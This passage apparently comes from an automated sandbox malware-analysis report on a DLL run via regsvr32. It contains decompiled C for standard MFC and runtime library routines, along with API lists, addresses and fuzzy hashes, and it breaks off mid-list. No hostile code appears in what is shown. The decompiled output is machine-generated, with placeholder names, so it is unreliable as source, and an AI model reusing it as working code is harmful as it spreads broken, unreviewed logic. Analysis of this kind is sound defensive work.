                                                                                                            • Instruction ID: 115bf12ed0fa7589b407f79f41f639b3f7b4823b02c2866c4b7f4f1f1b5172d7
                                                                                                            • Opcode Fuzzy Hash: df584dda371157191712c15505aae26ff14b4c57a0491ab4d9c6d3331c076541
                                                                                                            • Instruction Fuzzy Hash: 43B00235408610FFDF025F50DD4480ABBA2BB89321F10D958F1AA51430D7329420EF07
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 10011C86 Relevance: 12.1, APIs: 8, Instructions: 129filestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 88%
                                                                                                            			E10011C86(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t38;
				long _t49;
				CHAR* _t50;
				CHAR* _t56;
				CHAR* _t59;
				void* _t61;
				int _t65;
				CHAR* _t74;
				void* _t75;
				void* _t76;
				void* _t89;
				void* _t90;
				CHAR* _t92;
				void* _t93;
				void* _t96;
				struct _WIN32_FIND_DATAA* _t98;
				void* _t100;
				CHAR* _t106;

				_t94 = __esi;
				_t90 = __edx;
				_t76 = __ecx;
				_t98 = _t100 - 0x13c;
				_t38 =  *0x10045580; // 0x8f64cb61
				 *(_t98 + 0x140) = _t38 ^ _t98;
				_push(0x14);
				E1001FBC4(E10033C93, __ebx, __edi, __esi);
				_t92 =  *(_t98 + 0x14c);
				_t74 =  *(_t98 + 0x150);
				 *((intOrPtr*)(_t98 - 0x18)) =  *((intOrPtr*)(_t98 + 0x154));
				_t106 = _t92;
				_t107 = _t106 == 0;
				if(_t106 == 0) {
					L1:
					E10004E6E(_t74, _t76, _t92, _t94, _t107);
				}
				if((0 | _t74 != 0x00000000) == 0) {
					goto L1;
				}
				_t49 = GetFullPathNameA(_t74, 0x104, _t92, _t98 - 0x14);
				if(_t49 != 0) {
					__eflags = _t49 - 0x104;
					if(_t49 >= 0x104) {
						goto L5;
					} else {
						E1000424F(_t98 - 0x10, E1001044F());
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						E10011ABC(_t74, _t98, __eflags, _t92, _t98 - 0x10);
						_t56 = PathIsUNCA( *(_t98 - 0x10));
						__eflags = _t56;
						if(_t56 != 0) {
							L19:
							E10001260( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
							_t50 = 1;
							__eflags = 1;
						} else {
							_t59 = GetVolumeInformationA( *(_t98 - 0x10), _t56, _t56, _t56, _t98 - 0x20, _t98 - 0x1c, _t56, _t56);
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags =  *(_t98 - 0x1c) & 0x00000002;
								if(( *(_t98 - 0x1c) & 0x00000002) == 0) {
									CharUpperA(_t92);
								}
								__eflags =  *(_t98 - 0x1c) & 0x00000004;
								if(( *(_t98 - 0x1c) & 0x00000004) != 0) {
									goto L19;
								} else {
									_t61 = FindFirstFileA(_t74, _t98);
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										goto L19;
									} else {
										FindClose(_t61);
										__eflags =  *(_t98 - 0x14);
										if( *(_t98 - 0x14) == 0) {
											goto L10;
										} else {
											__eflags =  *(_t98 - 0x14) - _t92;
											if( *(_t98 - 0x14) <= _t92) {
												goto L10;
											} else {
												_t65 = lstrlenA( &(_t98->cFileName));
												_t89 =  *(_t98 - 0x14) - _t92;
												__eflags = _t65 + _t89 - 0x104;
												if(_t65 + _t89 >= 0x104) {
													goto L10;
												} else {
													_t97 = 0x104 - _t89;
													__eflags = 0x104 - _t89;
													E10005C93(_t74, _t90, _t92, 0x104 - _t89, _t98,  *(_t98 - 0x14), _t97,  &(_t98->cFileName));
													goto L19;
												}
											}
										}
									}
								}
							} else {
								_push(_t74);
								E10011C5B( *((intOrPtr*)(_t98 - 0x18)));
								L10:
								E10001260( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
								goto L5;
							}
						}
					}
				} else {
					E10004EB7(_t74, _t76, _t92, 0x104, _t98, _t92, 0x104, _t74, 0xffffffff);
					_push(_t74);
					E10011C5B( *((intOrPtr*)(_t98 - 0x18)));
					L5:
					_t50 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
				_pop(_t93);
				_pop(_t96);
				_pop(_t75);
				return E1001FBB5(_t50, _t75,  *(_t98 + 0x140) ^ _t98, _t90, _t93, _t96);
			}






















                                                                                                            0x10011c86
                                                                                                            0x10011c86
                                                                                                            0x10011c86
                                                                                                            0x10011c8d
                                                                                                            0x10011c91
                                                                                                            0x10011c98
                                                                                                            0x10011c9e
                                                                                                            0x10011ca5
                                                                                                            0x10011cb0
                                                                                                            0x10011cb6
                                                                                                            0x10011cbc
                                                                                                            0x10011cc1
                                                                                                            0x10011cc6
                                                                                                            0x10011cc8
                                                                                                            0x10011cca
                                                                                                            0x10011cca
                                                                                                            0x10011cca
                                                                                                            0x10011cd8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10011ce6
                                                                                                            0x10011cee
                                                                                                            0x10011d0d
                                                                                                            0x10011d0f
                                                                                                            0x00000000
                                                                                                            0x10011d11
                                                                                                            0x10011d1a
                                                                                                            0x10011d1f
                                                                                                            0x10011d28
                                                                                                            0x10011d30
                                                                                                            0x10011d36
                                                                                                            0x10011d38
                                                                                                            0x10011dca
                                                                                                            0x10011dd0
                                                                                                            0x10011dd7
                                                                                                            0x10011dd7
                                                                                                            0x10011d3e
                                                                                                            0x10011d4e
                                                                                                            0x10011d54
                                                                                                            0x10011d56
                                                                                                            0x10011d6e
                                                                                                            0x10011d72
                                                                                                            0x10011d75
                                                                                                            0x10011d75
                                                                                                            0x10011d7b
                                                                                                            0x10011d7f
                                                                                                            0x00000000
                                                                                                            0x10011d81
                                                                                                            0x10011d86
                                                                                                            0x10011d8c
                                                                                                            0x10011d8f
                                                                                                            0x00000000
                                                                                                            0x10011d91
                                                                                                            0x10011d92
                                                                                                            0x10011d98
                                                                                                            0x10011d9c
                                                                                                            0x00000000
                                                                                                            0x10011d9e
                                                                                                            0x10011d9e
                                                                                                            0x10011da1
                                                                                                            0x00000000
                                                                                                            0x10011da3
                                                                                                            0x10011da7
                                                                                                            0x10011db0
                                                                                                            0x10011db4
                                                                                                            0x10011db6
                                                                                                            0x00000000
                                                                                                            0x10011db8
                                                                                                            0x10011dbc
                                                                                                            0x10011dbc
                                                                                                            0x10011dc2
                                                                                                            0x00000000
                                                                                                            0x10011dc7
                                                                                                            0x10011db6
                                                                                                            0x10011da1
                                                                                                            0x10011d9c
                                                                                                            0x10011d8f
                                                                                                            0x10011d58
                                                                                                            0x10011d58
                                                                                                            0x10011d5c
                                                                                                            0x10011d61
                                                                                                            0x10011d67
                                                                                                            0x00000000
                                                                                                            0x10011d67
                                                                                                            0x10011d56
                                                                                                            0x10011d38
                                                                                                            0x10011cf0
                                                                                                            0x10011cf5
                                                                                                            0x10011cfd
                                                                                                            0x10011d01
                                                                                                            0x10011d06
                                                                                                            0x10011d06
                                                                                                            0x10011d06
                                                                                                            0x10011ddb
                                                                                                            0x10011de3
                                                                                                            0x10011de4
                                                                                                            0x10011de5
                                                                                                            0x10011dfa

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 10011CA5
                                                                                                            • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 10011CE6
                                                                                                              • Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
                                                                                                              • Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F
                                                                                                            • PathIsUNCA.SHLWAPI(?,00000000), ref: 10011D30
                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 10011D4E
                                                                                                            • CharUpperA.USER32(?), ref: 10011D75
                                                                                                            • FindFirstFileA.KERNEL32(?,00000000), ref: 10011D86
                                                                                                            • FindClose.KERNEL32(00000000), ref: 10011D92
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10011DA7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FindH_prolog3Path$CharCloseException@8FileFirstFullInformationNameThrowUpperVolumelstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4099955704-0
                                                                                                            • Opcode ID: 34f6f2e06f6c52f7f72971c1c83acd915632a22f9182f0fa51328fb5f4cbc38c
                                                                                                            • Instruction ID: 71c2b450ac2c88f27229685b2eaf748cff0cdd07423a00f921b144b935e16ce8
                                                                                                            • Opcode Fuzzy Hash: 34f6f2e06f6c52f7f72971c1c83acd915632a22f9182f0fa51328fb5f4cbc38c
                                                                                                            • Instruction Fuzzy Hash: E841CD71A0014AAFEB15DBB4CC89AFF77BCEF44355F010529F915EA192EB30E984CA60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100037A6 Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E100037A6(void* __ecx, void* __edx) {
				signed int _v8;
				int _v88;
				char _v92;
				struct tagRECT _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t16;
				int _t18;
				void* _t19;
				int _t23;
				int _t24;
				void* _t40;
				void* _t48;
				void* _t49;
				void* _t52;
				signed int _t53;

				_t48 = __edx;
				_t16 =  *0x10045580; // 0x8f64cb61
				_v8 = _t16 ^ _t53;
				_t52 = __ecx;
				_t18 = IsIconic( *(__ecx + 0x20));
				_t54 = _t18;
				if(_t18 == 0) {
					_t19 = E10007997(_t40, _t52, _t49, _t52, __eflags);
				} else {
					_push(_t40);
					E1001017C(_t40,  &_v92, _t49, _t52, _t54);
					SendMessageA( *(_t52 + 0x20), 0x27, _v88, 0);
					_t23 = GetSystemMetrics(0xb);
					_t24 = GetSystemMetrics(0xc);
					GetClientRect( *(_t52 + 0x20),  &_v108);
					asm("cdq");
					asm("cdq");
					DrawIcon(_v88, _v108.right - _v108.left - _t23 + 1 - _t48 >> 1, _v108.bottom - _v108.top - _t24 + 1 - _t48 >> 1,  *(_t52 + 0x11c));
					_t19 = E100101D0(_t23,  &_v92, _t24, _t52, _t54);
					_t49 = _t52;
					_t40 = _t49;
				}
				return E1001FBB5(_t19, _t40, _v8 ^ _t53, _t48, _t49, _t52);
			}





















                                                                                                            0x100037a6
                                                                                                            0x100037ac
                                                                                                            0x100037b3
                                                                                                            0x100037b7
                                                                                                            0x100037bc
                                                                                                            0x100037c2
                                                                                                            0x100037c4
                                                                                                            0x1000383b
                                                                                                            0x100037c6
                                                                                                            0x100037c6
                                                                                                            0x100037cc
                                                                                                            0x100037db
                                                                                                            0x100037e9
                                                                                                            0x100037ef
                                                                                                            0x100037fa
                                                                                                            0x1000380f
                                                                                                            0x1000381e
                                                                                                            0x10003827
                                                                                                            0x10003830
                                                                                                            0x10003835
                                                                                                            0x10003836
                                                                                                            0x10003836
                                                                                                            0x1000384c

                                                                                                            APIs
                                                                                                            • IsIconic.USER32 ref: 100037BC
                                                                                                              • Part of subcall function 1001017C: __EH_prolog3.LIBCMT ref: 10010183
                                                                                                              • Part of subcall function 1001017C: BeginPaint.USER32(?,?,00000004,100079AE,?,00000058,10003840), ref: 100101AF
                                                                                                            • SendMessageA.USER32(?,00000027,?,00000000), ref: 100037DB
                                                                                                            • GetSystemMetrics.USER32 ref: 100037E9
                                                                                                            • GetSystemMetrics.USER32 ref: 100037EF
                                                                                                            • GetClientRect.USER32 ref: 100037FA
                                                                                                            • DrawIcon.USER32 ref: 10003827
                                                                                                              • Part of subcall function 100101D0: __EH_prolog3.LIBCMT ref: 100101D7
                                                                                                              • Part of subcall function 100101D0: EndPaint.USER32(?,?,00000004,100079D4,?,?,00000058,10003840), ref: 100101F2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog3MetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 2914073315-0
                                                                                                            • Opcode ID: 1e7be54cfa6d3c1e1a4138fbb5d3b695b42003d303c7effa8fdb7e59f0e8d856
                                                                                                            • Instruction ID: d120da58dcfcd53bd7750bb53c5c236feb3430fa3c37942b0e1c20916eef10ca
                                                                                                            • Opcode Fuzzy Hash: 1e7be54cfa6d3c1e1a4138fbb5d3b695b42003d303c7effa8fdb7e59f0e8d856
                                                                                                            • Instruction Fuzzy Hash: 11112131A00219AFDB01DFB8CD499AEBBB9FB49704F004128F546DB165DA60A905CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10005CE3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 73%
                                                                                                            			E10005CE3(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __esi;
				void* __ebp;
				signed int _t9;
				intOrPtr* _t18;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t34;
				void* _t35;
				signed int _t36;
				void* _t37;

				_t33 = __edi;
				_t32 = __edx;
				_t28 = __ecx;
				_t26 = __ebx;
				_t9 =  *0x10045580; // 0x8f64cb61
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					_push(E10020E9D(__edx,  &_v288, 4, "LOC"));
					E10001000(__ebx, _t28, __edi, _t35);
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E10020B71(_t39));
					 *(E10020B71(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E10020F1E( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E10020B71(_t39);
					_t40 =  *_t18;
					if( *_t18 == 0) {
						 *(E10020B71(__eflags)) = _t34;
					} else {
						E10005177( *((intOrPtr*)(E10020B71(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E1001FBB5(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}

















                                                                                                            0x10005ce3
                                                                                                            0x10005ce3
                                                                                                            0x10005ce3
                                                                                                            0x10005ce3
                                                                                                            0x10005cec
                                                                                                            0x10005cf3
                                                                                                            0x10005cf6
                                                                                                            0x10005cfe
                                                                                                            0x10005d06
                                                                                                            0x10005d7a
                                                                                                            0x10005d7c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10005d7e
                                                                                                            0x10005d08
                                                                                                            0x10005d15
                                                                                                            0x10005d16
                                                                                                            0x10005d1b
                                                                                                            0x10005d1e
                                                                                                            0x10005d1e
                                                                                                            0x10005d1f
                                                                                                            0x10005d25
                                                                                                            0x10005d2c
                                                                                                            0x10005d3c
                                                                                                            0x10005d51
                                                                                                            0x10005d53
                                                                                                            0x10005d58
                                                                                                            0x10005d5b
                                                                                                            0x10005d85
                                                                                                            0x10005d5d
                                                                                                            0x10005d64
                                                                                                            0x10005d69
                                                                                                            0x10005d8a
                                                                                                            0x10005d9f
                                                                                                            0x10005d9f
                                                                                                            0x10005d90
                                                                                                            0x10005d97
                                                                                                            0x10005d97
                                                                                                            0x10005da1
                                                                                                            0x10005da2
                                                                                                            0x10005da2
                                                                                                            0x10005daf

                                                                                                            APIs
                                                                                                            • _strcpy_s.LIBCMT ref: 10005D10
                                                                                                              • Part of subcall function 10001000: __CxxThrowException@8.LIBCMT ref: 10004E82
                                                                                                              • Part of subcall function 10001000: __EH_prolog3.LIBCMT ref: 10004E8F
                                                                                                              • Part of subcall function 10020B71: __getptd_noexit.LIBCMT ref: 10020B71
                                                                                                            • __snprintf_s.LIBCMT ref: 10005D49
                                                                                                              • Part of subcall function 10020F1E: __vsnprintf_s_l.LIBCMT ref: 10020F33
                                                                                                            • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10005D74
                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 10005D97
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Exception@8H_prolog3InfoLibraryLoadLocaleThrow__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                            • String ID: LOC
                                                                                                            • API String ID: 4018564869-519433814
                                                                                                            • Opcode ID: 4f0d158bbcc9af0cb7d9660866c3b5ed689d3bebe7d48719b60939431f1f056f
                                                                                                            • Instruction ID: a9d45852776f355f9b5d50c5a058e6740ec097f8b3d9f9fbd80e36b8e0c44140
                                                                                                            • Opcode Fuzzy Hash: 4f0d158bbcc9af0cb7d9660866c3b5ed689d3bebe7d48719b60939431f1f056f
                                                                                                            • Instruction Fuzzy Hash: F9113A35900208AFE732D764DC4BBDF76ACDF04396F5104A3F6059B0A6DB716D448661
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001FBB5 Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 85%
                                                                                                            			E1001FBB5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x10045580; // 0x8f64cb61
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x10048ee8 = _t6;
				 *0x10048ee4 = _t22;
				 *0x10048ee0 = _t25;
				 *0x10048edc = _t21;
				 *0x10048ed8 = _t27;
				 *0x10048ed4 = _t26;
				 *0x10048f00 = ss;
				 *0x10048ef4 = cs;
				 *0x10048ed0 = ds;
				 *0x10048ecc = es;
				 *0x10048ec8 = fs;
				 *0x10048ec4 = gs;
				asm("pushfd");
				_pop( *0x10048ef8);
				 *0x10048eec =  *_t31;
				 *0x10048ef0 = _v0;
				 *0x10048efc =  &_a4;
				 *0x10048e38 = 0x10001;
				_t11 =  *0x10048ef0; // 0x0
				 *0x10048dec = _t11;
				 *0x10048de0 = 0xc0000409;
				 *0x10048de4 = 1;
				_t12 =  *0x10045580; // 0x8f64cb61
				_v812 = _t12;
				_t13 =  *0x10045584; // 0x709b349e
				_v808 = _t13;
				 *0x10048e30 = IsDebuggerPresent();
				_push(1);
				E1002CAF6(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x10039e30);
				if( *0x10048e30 == 0) {
					_push(1);
					E1002CAF6(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                            0x1001fbb5
                                                                                                            0x1001fbb5
                                                                                                            0x1001fbb5
                                                                                                            0x1001fbb5
                                                                                                            0x1001fbb5
                                                                                                            0x1001fbb5
                                                                                                            0x1001fbb5
                                                                                                            0x1001fbbb
                                                                                                            0x1001fbbd
                                                                                                            0x1001fbbd
                                                                                                            0x10026285
                                                                                                            0x1002628a
                                                                                                            0x10026290
                                                                                                            0x10026296
                                                                                                            0x1002629c
                                                                                                            0x100262a2
                                                                                                            0x100262a8
                                                                                                            0x100262af
                                                                                                            0x100262b6
                                                                                                            0x100262bd
                                                                                                            0x100262c4
                                                                                                            0x100262cb
                                                                                                            0x100262d2
                                                                                                            0x100262d3
                                                                                                            0x100262dc
                                                                                                            0x100262e4
                                                                                                            0x100262ec
                                                                                                            0x100262f7
                                                                                                            0x10026301
                                                                                                            0x10026306
                                                                                                            0x1002630b
                                                                                                            0x10026315
                                                                                                            0x1002631f
                                                                                                            0x10026324
                                                                                                            0x1002632a
                                                                                                            0x1002632f
                                                                                                            0x1002633b
                                                                                                            0x10026340
                                                                                                            0x10026342
                                                                                                            0x1002634a
                                                                                                            0x10026355
                                                                                                            0x10026362
                                                                                                            0x10026364
                                                                                                            0x10026366
                                                                                                            0x1002636b
                                                                                                            0x1002637f

                                                                                                            APIs
                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 10026335
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1002634A
                                                                                                            • UnhandledExceptionFilter.KERNEL32(10039E30), ref: 10026355
                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 10026371
                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 10026378
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 2579439406-0
                                                                                                            • Opcode ID: 01d0eb0c0dcaba5af3b0515de7aff01423ec1db4b762333c52675aa0d91e68a1
                                                                                                            • Instruction ID: 5ceda17ef6beca13f91ed3eb6d695352f2d28ceca655d5ac6984320e078a27cc
                                                                                                            • Opcode Fuzzy Hash: 01d0eb0c0dcaba5af3b0515de7aff01423ec1db4b762333c52675aa0d91e68a1
                                                                                                            • Instruction Fuzzy Hash: FF21F274810225DFF741EF2ADEC46593BB4FB0A305F40481AEA08CB662E7B15A85CF0D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000ACED Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 91%
                                                                                                            			E1000ACED(void* __ecx) {
				void* __ebx;
				void* __edi;
				signed int _t5;
				void* _t15;
				void* _t18;
				void* _t19;

				_t15 = __ecx;
				if((E1000EEC4(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E1000A84C(_t15, _t15, _t18, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E10005CAE();
				if(_t19 == 0) {
					goto L6;
				}
				_t18 = GetKeyState;
				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}









                                                                                                            0x1000acf0
                                                                                                            0x1000acfc
                                                                                                            0x1000ad44
                                                                                                            0x1000ad46
                                                                                                            0x1000ad4d
                                                                                                            0x00000000
                                                                                                            0x1000ad4f
                                                                                                            0x1000ad03
                                                                                                            0x1000ad07
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000ad09
                                                                                                            0x1000ad16
                                                                                                            0x00000000
                                                                                                            0x1000ad2a
                                                                                                            0x1000ad39
                                                                                                            0x00000000
                                                                                                            0x1000ad41

                                                                                                            APIs
                                                                                                              • Part of subcall function 1000EEC4: GetWindowLongA.USER32 ref: 1000EECF
                                                                                                            • GetKeyState.USER32(00000010), ref: 1000AD11
                                                                                                            • GetKeyState.USER32(00000011), ref: 1000AD1A
                                                                                                            • GetKeyState.USER32(00000012), ref: 1000AD23
                                                                                                            • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 1000AD39
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
